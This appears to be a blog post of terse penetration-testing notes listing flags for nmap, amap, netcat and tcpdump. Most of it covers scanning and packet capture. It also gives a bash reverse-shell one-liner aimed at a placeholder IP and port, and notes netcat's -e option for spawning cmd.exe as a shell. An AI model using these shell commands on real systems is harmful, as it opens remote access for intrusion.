nmap
-PN don't ping, just scan
-sS syn scan (stealth scan)
-sT tcp scan (full handshake
-sU udp scan
-sV
-p ports to scan
--packet-trace
-sP ping scan
-n don't resolve names
--badchecksum
-reason
-O os fingerprint
amap -bqv banners quiet verbose
netcat
-d -run detatched
-l listne
-L listen and maintain windows only
-p port
-e run whatever follows when a connection is made - typically cmd.exe to get a shell
/bin/bash -i > /dev/tcp/[yourip]/[yourport] 0<&1 2>&1
tcpdump -n use numbers instead of names for machines
-nn use numbers instead of name for machines and ports
-i [int] sniff on interface. use -D to list interfaces
-v verbose
-w dump to file
-x print hex
-X print ascii and hex
-s [snaplen] snarf this many bytes, instead of default 68
-p not in promiscumous mode
ether, ip, ip6, arp, rarp, tcp, udp
host
net
port
portrange
src dst
No comments:
Post a Comment